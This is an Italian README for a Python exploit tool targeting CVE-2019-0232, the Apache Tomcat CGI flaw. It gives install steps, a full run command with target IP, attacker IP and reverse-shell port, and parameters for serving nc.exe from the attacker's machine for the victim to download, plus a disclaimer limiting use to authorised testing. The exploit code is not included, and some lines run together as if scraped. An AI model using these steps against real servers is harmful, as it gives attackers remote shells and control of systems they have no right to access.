
Exploit in Python per CVE-2019-0232 che prende di mira le vulnerabilità CGI di Apache Tomcat con connessione reverse shell automatizzata e parametri target/attaccante personalizzabili.
Uno script Python progettato per sfruttare vulnerabilità CGI su server Apache Tomcat tramite l'esecuzione di una connessione reverse shell.

requestsgit clone <url-del-repositorio>
cd <directory-del-repositorio>
pip install requests
python3 tomcat_cgi_exploit.py -t <IP_TARGET> -i <IP_ATTACCANTE> -ncp <PORTA_REVERSE_SHELL>
-t, --target: Indirizzo IP del target con Apache Tomcat-i, --ip: Indirizzo IP dell'attaccante che ospita nc.exe-ncp, --nc-port: Porta per la connessione reverse shell-p, --port: Porta del target (default: 8080)-sp, --server-port: Porta del server per ospitare nc.exe (default: 80)-cgi, --cgi-script: Nome dello script CGI da sfruttare (default: cmd.bat)python3 tomcat_cgi_exploit.py -t 192.168.1.100 -i 192.168.1.50 -ncp 4444
Questo strumento è fornito esclusivamente a scopo educativo e per test di penetrazione autorizzati. L'autore e i collaboratori non sono responsabili per qualsiasi uso improprio o danno causato da questo script. Ottenere sempre l'autorizzazione appropriata prima di testare qualsiasi sistema.